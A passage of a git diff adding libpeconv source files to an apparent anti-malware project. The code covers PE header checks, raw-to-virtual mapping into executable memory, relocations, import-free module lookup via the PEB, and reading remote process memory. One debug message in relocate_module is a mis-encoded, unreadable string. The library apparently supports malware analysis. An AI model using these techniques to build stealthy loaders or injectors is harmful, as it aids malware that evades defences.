(peconv::has_valid_import_table((const 
PBYTE)pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Valid Import Table found" << std::endl; +#endif + v_score++; + } + if (peconv::has_valid_relocation_table((const PBYTE)pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Valid Relocations Table found" << std::endl; +#endif + v_score++; + } + if (is_hdr_virtual_align(pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Header virtual align OK" << std::endl; +#endif + v_score++; + } + if (is_virtual_padding(pe_buffer, pe_size)) { +#ifdef _DEBUG + std::cout << "Virtual Padding OK" << std::endl; +#endif + v_score++; + } +#ifdef _DEBUG + std::cout << "TOTAL v_score: " << std::dec << v_score << std::endl; +#endif + if (v_score > 0) { + return true; + } + return false; +} + +bool peconv::is_pe_raw(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + if (peconv::get_sections_count(pe_buffer, pe_size) == 0) { + return true; + } + if (is_pe_mapped(pe_buffer, pe_size)) { + // it has artefacts typical for a PE in a virtual alignment + return false; + } + if (sec_hdrs_erased(pe_buffer, pe_size, true)) { +#ifdef _DEBUG + std::cout << "Raw alignment is erased\n"; +#endif + // the raw alignment of the sections is erased + return false; + } + return true; +} + +// checks if any of the executable sections has been expanded in the memory +bool peconv::is_pe_expanded(IN const BYTE* pe_buffer, IN size_t pe_size) +{ + //walk through sections and check their sizes + size_t sections_count = peconv::get_sections_count(pe_buffer, pe_size); + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(pe_buffer, pe_size, i); + //scan only executable sections + if ((sec->Characteristics & IMAGE_SCN_MEM_EXECUTE) != 0) { + if (is_section_expanded(pe_buffer, pe_size, sec)) { + return true; + } + } + } + return false; +} + +// checks if the section's content in memory is bigger than in the raw format +bool peconv::is_section_expanded(IN const BYTE* pe_buffer, IN size_t pe_size, IN const 
PIMAGE_SECTION_HEADER sec) +{ + if (!sec) return false; + + size_t sec_vsize = peconv::get_virtual_sec_size(pe_buffer, sec, true); + size_t sec_rsize = sec->SizeOfRawData; + + if (sec_rsize >= sec_vsize) return false; + size_t diff = sec_vsize - sec_rsize; + + BYTE* sec_raw_end_ptr = (BYTE*)((ULONGLONG)pe_buffer + sec->VirtualAddress + sec_rsize); + if (!peconv::validate_ptr((const LPVOID)pe_buffer, pe_size, sec_raw_end_ptr, diff)) { + return false; + } + if (!is_padding(sec_raw_end_ptr, diff, 0)) { + //this is not padding: non-zero content detected + return true; + } + return false; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_raw_to_virtual.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_raw_to_virtual.cpp new file mode 100644 index 0000000..06d90fc --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_raw_to_virtual.cpp @@ -0,0 +1,140 @@ +#include "peconv/pe_raw_to_virtual.h" + +#include "peconv/util.h" +#include "peconv/pe_hdrs_helper.h" + +#include + +using namespace peconv; + +// Map raw PE into virtual memory of local process: +bool sections_raw_to_virtual(IN const BYTE* payload, IN SIZE_T payloadSize, OUT BYTE* destBuffer, IN SIZE_T destBufferSize) +{ + if (!payload || !destBuffer) return false; + + bool is64b = is64bit(payload); + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (payload_nt_hdr == NULL) { + std::cerr << "Invalid payload: " << std::hex << (ULONGLONG) payload << std::endl; + return false; + } + + IMAGE_FILE_HEADER *fileHdr = NULL; + DWORD hdrsSize = 0; + LPVOID secptr = NULL; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr64->FileHeader); + hdrsSize = payload_nt_hdr64->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr64->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*)payload_nt_hdr; + fileHdr = &(payload_nt_hdr32->FileHeader); + hdrsSize 
= payload_nt_hdr32->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr32->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } + + DWORD first_raw = 0; + //copy all the sections, one by one: + SIZE_T raw_end = 0; + for (WORD i = 0; i < fileHdr->NumberOfSections; i++) { + PIMAGE_SECTION_HEADER next_sec = (PIMAGE_SECTION_HEADER)((ULONGLONG)secptr + (IMAGE_SIZEOF_SECTION_HEADER * i)); + if (!validate_ptr((const LPVOID)payload, destBufferSize, next_sec, IMAGE_SIZEOF_SECTION_HEADER)) { + return false; + } + if (next_sec->PointerToRawData == 0 || next_sec->SizeOfRawData == 0) { + continue; //skipping empty + } + LPVOID section_mapped = destBuffer + next_sec->VirtualAddress; + LPVOID section_raw_ptr = (BYTE*)payload + next_sec->PointerToRawData; + SIZE_T sec_size = next_sec->SizeOfRawData; + raw_end = next_sec->SizeOfRawData + next_sec->PointerToRawData; + + if ((next_sec->VirtualAddress + sec_size) > destBufferSize) { + std::cerr << "[!] Virtual section size is out ouf bounds: " << std::hex << sec_size << std::endl; + sec_size = (destBufferSize > next_sec->VirtualAddress) ? SIZE_T(destBufferSize - next_sec->VirtualAddress) : 0; + std::cerr << "[!] Truncated to maximal size: " << std::hex << sec_size << ", buffer size:" << destBufferSize << std::endl; + } + if (next_sec->VirtualAddress >= destBufferSize && sec_size != 0) { + std::cerr << "[-] VirtualAddress of section is out ouf bounds: " << std::hex << next_sec->VirtualAddress << std::endl; + return false; + } + if (next_sec->PointerToRawData + sec_size > destBufferSize) { + std::cerr << "[-] Raw section size is out ouf bounds: " << std::hex << sec_size << std::endl; + return false; + } + // validate source: + if (!validate_ptr((const LPVOID)payload, payloadSize, section_raw_ptr, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... 
" << std::endl; + continue; + } + // validate destination: + if (!peconv::validate_ptr(destBuffer, destBufferSize, section_mapped, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... " << std::endl; + continue; + } + memcpy(section_mapped, section_raw_ptr, sec_size); + if (first_raw == 0 || (next_sec->PointerToRawData < first_raw)) { + first_raw = next_sec->PointerToRawData; + } + } + + //copy payload's headers: + if (hdrsSize == 0) { + hdrsSize= first_raw; +#ifdef _DEBUG + std::cout << "hdrsSize not filled, using calculated size: " << std::hex << hdrsSize << "\n"; +#endif + } + if (!validate_ptr((const LPVOID)payload, destBufferSize, (const LPVOID)payload, hdrsSize)) { + return false; + } + memcpy(destBuffer, payload, hdrsSize); + return true; +} + +BYTE* peconv::pe_raw_to_virtual( + IN const BYTE* payload, + IN size_t in_size, + OUT size_t &out_size, + IN OPTIONAL bool executable, + IN OPTIONAL ULONGLONG desired_base +) +{ + //check payload: + BYTE* nt_hdr = get_nt_hdrs(payload); + if (nt_hdr == NULL) { + std::cerr << "Invalid payload: " << std::hex << (ULONGLONG) payload << std::endl; + return nullptr; + } + DWORD payloadImageSize = 0; + + bool is64 = is64bit(payload); + if (is64) { + IMAGE_NT_HEADERS64* payload_nt_hdr = (IMAGE_NT_HEADERS64*)nt_hdr; + payloadImageSize = payload_nt_hdr->OptionalHeader.SizeOfImage; + } + else { + IMAGE_NT_HEADERS32* payload_nt_hdr = (IMAGE_NT_HEADERS32*)nt_hdr; + payloadImageSize = payload_nt_hdr->OptionalHeader.SizeOfImage; + } + + DWORD protect = executable ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE; + + //first we will prepare the payload image in the local memory, so that it will be easier to edit it, apply relocations etc. 
+ //when it will be ready, we will copy it into the space reserved in the target process + BYTE* localCopyAddress = alloc_pe_buffer(payloadImageSize, protect, desired_base); + if (localCopyAddress == NULL) { + std::cerr << "Could not allocate memory in the current process" << std::endl; + return NULL; + } + //printf("Allocated local memory: %p size: %x\n", localCopyAddress, payloadImageSize); + if (!sections_raw_to_virtual(payload, in_size, (BYTE*)localCopyAddress, payloadImageSize)) { + std::cerr << "Could not copy PE file" << std::endl; + return NULL; + } + out_size = payloadImageSize; + return localCopyAddress; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/pe_virtual_to_raw.cpp b/ai_anti_malware/libpeconv/libpeconv/src/pe_virtual_to_raw.cpp new file mode 100644 index 0000000..72670bb --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/pe_virtual_to_raw.cpp @@ -0,0 +1,213 @@ +#include "peconv/pe_virtual_to_raw.h" + +#include "peconv/util.h" +#include "peconv/pe_hdrs_helper.h" +#include "peconv/relocate.h" + +#include + +using namespace peconv; + +bool sections_virtual_to_raw(BYTE* payload, SIZE_T payload_size, OUT BYTE* destAddress, OUT SIZE_T *raw_size_ptr) +{ + if (!payload || !destAddress) return false; + + bool is64b = is64bit(payload); + + BYTE* payload_nt_hdr = get_nt_hdrs(payload); + if (payload_nt_hdr == NULL) { + std::cerr << "Invalid payload: " << std::hex << (ULONGLONG) payload << std::endl; + return false; + } + + IMAGE_FILE_HEADER *fileHdr = NULL; + DWORD hdrsSize = 0; + LPVOID secptr = NULL; + if (is64b) { + IMAGE_NT_HEADERS64* payload_nt_hdr64 = (IMAGE_NT_HEADERS64*) payload_nt_hdr; + fileHdr = &(payload_nt_hdr64->FileHeader); + hdrsSize = payload_nt_hdr64->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr64->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } else { + IMAGE_NT_HEADERS32* payload_nt_hdr32 = (IMAGE_NT_HEADERS32*) payload_nt_hdr; + fileHdr = &(payload_nt_hdr32->FileHeader); + hdrsSize = 
payload_nt_hdr32->OptionalHeader.SizeOfHeaders; + secptr = (LPVOID)((ULONGLONG)&(payload_nt_hdr32->OptionalHeader) + fileHdr->SizeOfOptionalHeader); + } + + //copy all the sections, one by one: +#ifdef _DEBUG + std::cout << "Coping sections:" << std::endl; +#endif + DWORD first_raw = 0; + SIZE_T raw_end = hdrsSize; + for (WORD i = 0; i < fileHdr->NumberOfSections; i++) { + PIMAGE_SECTION_HEADER next_sec = (PIMAGE_SECTION_HEADER)((ULONGLONG)secptr + (IMAGE_SIZEOF_SECTION_HEADER * i)); + if (!validate_ptr(payload, payload_size, next_sec, IMAGE_SIZEOF_SECTION_HEADER)) { + return false; + } + + LPVOID section_mapped = (BYTE*) payload + next_sec->VirtualAddress; + LPVOID section_raw_ptr = destAddress + next_sec->PointerToRawData; + SIZE_T sec_size = next_sec->SizeOfRawData; + + size_t new_end = sec_size + next_sec->PointerToRawData; + if (new_end > raw_end) raw_end = new_end; + + if ((next_sec->VirtualAddress + sec_size) > payload_size) { + std::cerr << "[!] Virtual section size is out ouf bounds: " << std::hex << sec_size << std::endl; + sec_size = (payload_size > next_sec->VirtualAddress) ? SIZE_T(payload_size - next_sec->VirtualAddress) : 0; + std::cerr << "[!] Truncated to maximal size: " << std::hex << sec_size << ", buffer size: " << payload_size << std::endl; + } + if (next_sec->VirtualAddress > payload_size && sec_size != 0) { + std::cerr << "[-] VirtualAddress of section is out ouf bounds: " << std::hex << next_sec->VirtualAddress << std::endl; + return false; + } + if (next_sec->PointerToRawData + sec_size > payload_size) { + std::cerr << "[-] Raw section size is out ouf bounds: " << std::hex << sec_size << std::endl; + return false; + } +#ifdef _DEBUG + std::cout << "[+] " << next_sec->Name << " to: " << std::hex << section_raw_ptr << std::endl; +#endif + //validate source: + if (!peconv::validate_ptr(payload, payload_size, section_mapped, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... 
" << std::endl; + continue; + } + //validate destination: + if (!peconv::validate_ptr(destAddress, payload_size, section_raw_ptr, sec_size)) { + std::cerr << "[-] Section " << i << ": out ouf bounds, skipping... " << std::endl; + continue; + } + memcpy(section_raw_ptr, section_mapped, sec_size); + if (first_raw == 0 || (next_sec->PointerToRawData < first_raw)) { + first_raw = next_sec->PointerToRawData; + } + } + if (raw_end > payload_size) raw_end = payload_size; + if (raw_size_ptr != NULL) { + (*raw_size_ptr) = raw_end; + } + + //copy payload's headers: + if (hdrsSize == 0) { + hdrsSize = first_raw; +#ifdef _DEBUG + std::cout << "hdrsSize not filled, using calculated size: " << std::hex << hdrsSize << "\n"; +#endif + } + if (!validate_ptr(payload, payload_size, payload, hdrsSize)) { + return false; + } + memcpy(destAddress, payload, hdrsSize); + return true; +} + +BYTE* peconv::pe_virtual_to_raw( + IN BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &out_size, + IN OPTIONAL bool rebuffer +) +{ + BYTE* out_buf = (BYTE*)alloc_pe_buffer(in_size, PAGE_READWRITE); + if (out_buf == NULL) return NULL; //could not allocate output buffer + + BYTE* in_buf = payload; + if (rebuffer) { + in_buf = (BYTE*) alloc_pe_buffer(in_size, PAGE_READWRITE); + if (in_buf == NULL) { + free_pe_buffer(out_buf, in_size); + return NULL; + } + memcpy(in_buf, payload, in_size); + } + + ULONGLONG oldBase = get_image_base(in_buf); + bool isOk = true; + // from the loadBase go back to the original base + if (!relocate_module(in_buf, in_size, oldBase, loadBase)) { + //Failed relocating the module! Changing image base instead... + if (!update_image_base(in_buf, (ULONGLONG)loadBase)) { + std::cerr << "[-] Failed relocating the module!" << std::endl; + isOk = false; + } else { +#ifdef _DEBUG + std::cerr << "[!] WARNING: The module could not be relocated, so the ImageBase has been changed instead!" 
<< std::endl; +#endif + } + } + SIZE_T raw_size = 0; + if (isOk) { + if (!sections_virtual_to_raw(in_buf, in_size, out_buf, &raw_size)) { + isOk = false; + } + } + if (rebuffer && in_buf != NULL) { + free_pe_buffer(in_buf, in_size); + in_buf = NULL; + } + if (!isOk) { + free_pe_buffer(out_buf, in_size); + out_buf = NULL; + raw_size = 0; + } + out_size = raw_size; + return out_buf; +} + +BYTE* peconv::pe_realign_raw_to_virtual( + IN const BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &out_size +) +{ + out_size = in_size; + BYTE* out_buf = (BYTE*)alloc_pe_buffer(out_size, PAGE_READWRITE); + if (!out_buf) { + out_size = 0; + return nullptr; + } + memcpy(out_buf, payload, in_size); + + ULONGLONG oldBase = get_image_base(out_buf); + bool isOk = true; + // from the loadBase go back to the original base + if (!relocate_module(out_buf, out_size, oldBase, loadBase)) { + //Failed relocating the module! Changing image base instead... + if (!update_image_base(out_buf, (ULONGLONG)loadBase)) { + std::cerr << "[-] Failed relocating the module!" << std::endl; + isOk = false; + } else { +#ifdef _DEBUG + std::cerr << "[!] WARNING: The module could not be relocated, so the ImageBase has been changed instead!" 
<< std::endl; +#endif + } + } + //--- + //set raw alignment the same as virtual + DWORD v_alignment = peconv::get_sec_alignment((const PBYTE)payload, false); + if (!peconv::set_sec_alignment(out_buf, true, v_alignment)) { + isOk = false; + } + //set Raw pointers and sizes of the sections same as Virtual + size_t sections_count = peconv::get_sections_count(out_buf, out_size); + for (size_t i = 0; i < sections_count; i++) { + PIMAGE_SECTION_HEADER sec = peconv::get_section_hdr(out_buf, out_size, i); + if (!sec) break; + + sec->Misc.VirtualSize = peconv::get_virtual_sec_size(out_buf, sec, true); + sec->SizeOfRawData = sec->Misc.VirtualSize; + sec->PointerToRawData = sec->VirtualAddress; + } + //!--- + if (!isOk) { + free_pe_buffer(out_buf); + out_buf = nullptr; + out_size = 0; + } + return out_buf; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/peb_lookup.cpp b/ai_anti_malware/libpeconv/libpeconv/src/peb_lookup.cpp new file mode 100644 index 0000000..c58aa1a --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/peb_lookup.cpp @@ -0,0 +1,178 @@ +#include "ntddk.h" + +#include + +class SectionLocker { +public: + SectionLocker(RTL_CRITICAL_SECTION &_section) + : section(_section) + { + RtlEnterCriticalSection(§ion); + } + + ~SectionLocker() + { + RtlLeaveCriticalSection(§ion); + } + +protected: + RTL_CRITICAL_SECTION §ion; +}; + +//here we don't want to use any functions imported form extenal modules + +typedef struct _LDR_MODULE { + LIST_ENTRY InLoadOrderModuleList;// +0x00 + LIST_ENTRY InMemoryOrderModuleList;// +0x08 + LIST_ENTRY InInitializationOrderModuleList;// +0x10 + void* BaseAddress; // +0x18 + void* EntryPoint; // +0x1c + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + HANDLE SectionHandle; + ULONG CheckSum; + ULONG TimeDateStamp; +} LDR_MODULE, *PLDR_MODULE; + +inline PPEB get_peb() +{ +#if defined(_WIN64) + return (PPEB)__readgsqword(0x60); +#else + return 
(PPEB)__readfsdword(0x30); +/* +//alternative way to fetch it: + LPVOID PEB = NULL; + __asm { + mov eax, fs:[30h] + mov PEB, eax + }; + return (PPEB)PEB; + + or: + LPVOID PEB = RtlGetCurrentPeb(); +*/ +#endif +} + +inline WCHAR to_lowercase(WCHAR c1) +{ + if (c1 <= L'Z' && c1 >= L'A') { + c1 = (c1 - L'A') + L'a'; + } + return c1; +} + +bool is_wanted_module(LPWSTR curr_name, LPWSTR wanted_name) +{ + if (wanted_name == NULL || curr_name == NULL) return false; + + WCHAR *curr_end_ptr = curr_name; + while (*curr_end_ptr != L'\0') { + curr_end_ptr++; + } + if (curr_end_ptr == curr_name) return false; + + WCHAR *wanted_end_ptr = wanted_name; + while (*wanted_end_ptr != L'\0') { + wanted_end_ptr++; + } + if (wanted_end_ptr == wanted_name) return false; + + while ((curr_end_ptr != curr_name) && (wanted_end_ptr != wanted_name)) { + + if (to_lowercase(*wanted_end_ptr) != to_lowercase(*curr_end_ptr)) { + return false; + } + wanted_end_ptr--; + curr_end_ptr--; + } + return true; +} + +HMODULE peconv::get_module_via_peb(IN OPTIONAL LPWSTR module_name) +{ + PPEB peb = get_peb(); + if (!peb) { + return NULL; + } + SectionLocker locker(*peb->LoaderLock); + LIST_ENTRY head = peb->Ldr->InLoadOrderModuleList; + + const PLDR_MODULE first_module = *((PLDR_MODULE *)(&head)); + PLDR_MODULE curr_module = first_module; + if (!module_name) { + return (HMODULE)(curr_module->BaseAddress); + } + + // it is a cyclic list, so if the next record links to the initial one, it means we went throught the full loop + do { + // this should also work as a terminator, because the BaseAddress of the last module in the cycle is NULL + if (curr_module == NULL || curr_module->BaseAddress == NULL) { + break; + } + if (is_wanted_module(curr_module->BaseDllName.Buffer, module_name)) { + return (HMODULE)(curr_module->BaseAddress); + } + curr_module = (PLDR_MODULE)curr_module->InLoadOrderModuleList.Flink; + + } while (curr_module != first_module); + + return NULL; +} + +size_t peconv::get_module_size_via_peb(IN 
OPTIONAL HMODULE hModule) +{ + PPEB peb = get_peb(); + if (!peb) { + return 0; + } + SectionLocker locker(*peb->LoaderLock); + LIST_ENTRY head = peb->Ldr->InLoadOrderModuleList; + + const PLDR_MODULE first_module = *((PLDR_MODULE *)(&head)); + PLDR_MODULE curr_module = first_module; + if (!hModule) { + return (size_t)(curr_module->SizeOfImage); + } + + // it is a cyclic list, so if the next record links to the initial one, it means we went throught the full loop + do { + // this should also work as a terminator, because the BaseAddress of the last module in the cycle is NULL + if (curr_module == NULL || curr_module->BaseAddress == NULL) { + break; + } + if (hModule == (HMODULE)(curr_module->BaseAddress)) { + return (size_t)(curr_module->SizeOfImage); + } + curr_module = (PLDR_MODULE)curr_module->InLoadOrderModuleList.Flink; + + } while (curr_module != first_module); + + return 0; +} + +bool peconv::set_main_module_in_peb(HMODULE module_ptr) +{ + PPEB peb = get_peb(); + if (peb == NULL) { + return false; + } + SectionLocker locker(*peb->FastPebLock); + peb->ImageBaseAddress = module_ptr; + return true; +} + +HMODULE peconv::get_main_module_via_peb() +{ + PPEB peb = get_peb(); + if (peb == NULL) { + return NULL; + } + SectionLocker locker(*peb->FastPebLock); + return (HMODULE) peb->ImageBaseAddress; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/relocate.cpp b/ai_anti_malware/libpeconv/libpeconv/src/relocate.cpp new file mode 100644 index 0000000..a401ef1 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/relocate.cpp @@ -0,0 +1,189 @@ +#include "peconv/relocate.h" + +#include "peconv/pe_hdrs_helper.h" +#include +#include + +using namespace peconv; + +#define RELOC_32BIT_FIELD 3 +#define RELOC_64BIT_FIELD 0xA + +class ApplyRelocCallback : public RelocBlockCallback +{ +public: + ApplyRelocCallback(bool _is64bit, ULONGLONG _oldBase, ULONGLONG _newBase) + : RelocBlockCallback(_is64bit), oldBase(_oldBase), newBase(_newBase) + { + } + + virtual bool 
processRelocField(ULONG_PTR relocField) + { + if (is64bit) { + ULONGLONG* relocateAddr = (ULONGLONG*)((ULONG_PTR)relocField); + ULONGLONG rva = (*relocateAddr) - oldBase; + (*relocateAddr) = rva + newBase; + } + else { + DWORD* relocateAddr = (DWORD*)((ULONG_PTR)relocField); + ULONGLONG rva = ULONGLONG(*relocateAddr) - oldBase; + (*relocateAddr) = static_cast(rva + newBase); + } + return true; + } + +protected: + ULONGLONG oldBase; + ULONGLONG newBase; +}; + +bool is_empty_reloc_block(BASE_RELOCATION_ENTRY *block, SIZE_T entriesNum, DWORD page, PVOID modulePtr, SIZE_T moduleSize) +{ + if (entriesNum == 0) { + return true; // nothing to process + } + BASE_RELOCATION_ENTRY* entry = block; + for (SIZE_T i = 0; i < entriesNum; i++) { + if (!validate_ptr(modulePtr, moduleSize, entry, sizeof(BASE_RELOCATION_ENTRY))) { + return false; + } + DWORD type = entry->Type; + if (type != 0) { + //non empty block found + return false; + } + entry = (BASE_RELOCATION_ENTRY*)((ULONG_PTR)entry + sizeof(WORD)); + } + return true; +} + +bool process_reloc_block(BASE_RELOCATION_ENTRY *block, SIZE_T entriesNum, DWORD page, PVOID modulePtr, SIZE_T moduleSize, bool is64bit, RelocBlockCallback *callback) +{ + if (entriesNum == 0) { + return true; // nothing to process + } + BASE_RELOCATION_ENTRY* entry = block; + SIZE_T i = 0; + for (i = 0; i < entriesNum; i++) { + if (!validate_ptr(modulePtr, moduleSize, entry, sizeof(BASE_RELOCATION_ENTRY))) { + break; + } + DWORD offset = entry->Offset; + DWORD type = entry->Type; + if (type == 0) { + break; + } + if (type != RELOC_32BIT_FIELD && type != RELOC_64BIT_FIELD) { + if (callback) { //print debug messages only if the callback function was set + printf("[-] Not supported relocations format at %d: %d\n", (int)i, (int)type); + } + return false; + } + DWORD reloc_field = page + offset; + if (reloc_field >= moduleSize) { + if (callback) { //print debug messages only if the callback function was set + printf("[-] Malformed field: %lx\n", reloc_field); 
+ } + return false; + } + if (callback) { + bool isOk = callback->processRelocField(((ULONG_PTR)modulePtr + reloc_field)); + if (!isOk) { + std::cout << "[-] Failed processing reloc field at: " << std::hex << reloc_field << "\n"; + return false; + } + } + entry = (BASE_RELOCATION_ENTRY*)((ULONG_PTR)entry + sizeof(WORD)); + } + return (i != 0); +} + +bool peconv::process_relocation_table(IN PVOID modulePtr, IN SIZE_T moduleSize, IN RelocBlockCallback *callback) +{ + IMAGE_DATA_DIRECTORY* relocDir = peconv::get_directory_entry((const BYTE*)modulePtr, IMAGE_DIRECTORY_ENTRY_BASERELOC); + if (relocDir == NULL) { + std::cout << "[!] WARNING: no relocation table found!\n"; + return false; + } + if (!validate_ptr(modulePtr, moduleSize, relocDir, sizeof(IMAGE_DATA_DIRECTORY))) { + std::cerr << "[!] Invalid relocDir pointer\n"; + return false; + } + DWORD maxSize = relocDir->Size; + DWORD relocAddr = relocDir->VirtualAddress; + bool is64b = is64bit((BYTE*)modulePtr); + + IMAGE_BASE_RELOCATION* reloc = NULL; + + DWORD parsedSize = 0; + DWORD validBlocks = 0; + while (parsedSize < maxSize) { + reloc = (IMAGE_BASE_RELOCATION*)(relocAddr + parsedSize + (ULONG_PTR)modulePtr); + if (!validate_ptr(modulePtr, moduleSize, reloc, sizeof(IMAGE_BASE_RELOCATION))) { + std::cerr << "[-] Invalid address of relocations\n"; + return false; + } + if (reloc->SizeOfBlock == 0) { + break; + } + size_t entriesNum = (reloc->SizeOfBlock - 2 * sizeof(DWORD)) / sizeof(WORD); + DWORD page = reloc->VirtualAddress; + + BASE_RELOCATION_ENTRY* block = (BASE_RELOCATION_ENTRY*)((ULONG_PTR)reloc + sizeof(DWORD) + sizeof(DWORD)); + if (!validate_ptr(modulePtr, moduleSize, block, sizeof(BASE_RELOCATION_ENTRY))) { + std::cerr << "[-] Invalid address of relocations block\n"; + return false; + } + if (!is_empty_reloc_block(block, entriesNum, page, modulePtr, moduleSize)) { + if (process_reloc_block(block, entriesNum, page, modulePtr, moduleSize, is64b, callback)) { + validBlocks++; + } + else { + // the block was 
malformed + return false; + } + } + parsedSize += reloc->SizeOfBlock; + } + return (validBlocks != 0); +} + +bool apply_relocations(PVOID modulePtr, SIZE_T moduleSize, ULONGLONG newBase, ULONGLONG oldBase) +{ + const bool is64b = is64bit((BYTE*)modulePtr); + ApplyRelocCallback callback(is64b, oldBase, newBase); + return process_relocation_table(modulePtr, moduleSize, &callback); +} + +bool peconv::relocate_module(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ULONGLONG newBase, IN ULONGLONG oldBase) +{ + if (modulePtr == NULL) { + return false; + } + if (oldBase == 0) { + oldBase = get_image_base(modulePtr); + } + printf("ʼضλ: %p -> %p \n", oldBase, newBase); + +#ifdef _DEBUG + printf("New Base: %llx\n", newBase); + printf("Old Base: %llx\n", oldBase); +#endif + if (newBase == oldBase) { + printf("Nothing to relocate! oldBase is the same as the newBase!\n"); + return true; //nothing to relocate + } + if (apply_relocations(modulePtr, moduleSize, newBase, oldBase)) { + return true; + } +#ifdef _DEBUG + printf("Could not relocate the module!\n"); +#endif + return false; +} + +bool peconv::has_valid_relocation_table(IN const PBYTE modulePtr, IN const size_t moduleSize) +{ + return process_relocation_table(modulePtr, moduleSize, nullptr); +} + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/remote_pe_reader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/remote_pe_reader.cpp new file mode 100644 index 0000000..6ba6a9d --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/remote_pe_reader.cpp @@ -0,0 +1,299 @@ +#include "peconv/remote_pe_reader.h" + +#include + +#include "peconv/util.h" +#include "peconv/fix_imports.h" + +using namespace peconv; + +bool peconv::fetch_region_info(HANDLE processHandle, BYTE* moduleBase, MEMORY_BASIC_INFORMATION &page_info) +{ + memset(&page_info, 0, sizeof(MEMORY_BASIC_INFORMATION)); + SIZE_T out = VirtualQueryEx(processHandle, (LPCVOID)moduleBase, &page_info, sizeof(page_info)); + if (out != sizeof(page_info)) { + return false; + } 
+ return true; +} + +size_t peconv::fetch_region_size(HANDLE processHandle, BYTE* moduleBase) +{ + MEMORY_BASIC_INFORMATION page_info = { 0 }; + if (!peconv::fetch_region_info(processHandle, moduleBase, page_info)) { + return 0; + } + if (page_info.Type == 0) { + return false; //invalid type, skip it + } + if ((BYTE*)page_info.BaseAddress > moduleBase) { + return 0; //should never happen + } + size_t offset = moduleBase - (BYTE*)page_info.BaseAddress; + size_t area_size = page_info.RegionSize - offset; + return area_size; +} + +ULONGLONG peconv::fetch_alloc_base(HANDLE processHandle, BYTE* moduleBase) +{ + MEMORY_BASIC_INFORMATION page_info = { 0 }; + if (!peconv::fetch_region_info(processHandle, moduleBase, page_info)) { + return 0; + } + if (page_info.Type == 0) { + return 0; //invalid type, skip it + } + return (ULONGLONG) page_info.AllocationBase; +} + +size_t peconv::read_remote_memory(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size) +{ + if (!buffer) { + return 0; + } + memset(buffer, 0, buffer_size); + + SIZE_T read_size = 0; + DWORD last_error = ERROR_SUCCESS; + + for (SIZE_T to_read_size = buffer_size; to_read_size > 0; to_read_size -= step_size) + { + if (ReadProcessMemory(processHandle, start_addr, buffer, to_read_size, &read_size)) { + break; + } + // is it not the first attempt? + if (last_error != ERROR_SUCCESS) { + if (read_size == 0 && (last_error != ERROR_PARTIAL_COPY)) { + last_error = GetLastError(); + break; // no progress, break + } + } + + last_error = GetLastError(); + + if ((to_read_size < step_size) || step_size == 0) { + break; + } + //otherwise, decrease the to_read_size, and try again... + } + +#ifdef _DEBUG + if (read_size == 0) { + std::cerr << "[WARNING] Cannot read memory. 
Last Error : " << last_error << std::endl; + } + else if (read_size < buffer_size) { + std::cerr << "[WARNING] Read size: " << std::hex << read_size + << " is smaller than the requested size: " << std::hex << buffer_size + << ". Last Error: " << last_error << std::endl; + + } +#endif + return static_cast(read_size); +} + +size_t read_remote_region(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size) +{ + if (buffer == nullptr) { + return 0; + } + size_t region_size = peconv::fetch_region_size(processHandle, start_addr); + if (region_size == 0) return false; + + if (region_size >= buffer_size) { + return peconv::read_remote_memory(processHandle, start_addr, buffer, buffer_size, step_size); + } + return peconv::read_remote_memory(processHandle, start_addr, buffer, region_size, step_size); +} + +size_t peconv::read_remote_area(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size) +{ + if (!buffer || !start_addr) { + return 0; + } + memset(buffer, 0, buffer_size); + + size_t read = 0; + for (read = 0; read < buffer_size; ) { + size_t read_chunk = read_remote_region(processHandle, start_addr + read, buffer + read, buffer_size - read, step_size); + if (read_chunk == 0) { + size_t region_size = peconv::fetch_region_size(processHandle, start_addr); + if (region_size == 0) break; + //skip the region that could not be read: + read += region_size; + continue; + } + read += read_chunk; + } + return read; +} + +bool peconv::read_remote_pe_header(HANDLE processHandle, BYTE *start_addr, OUT 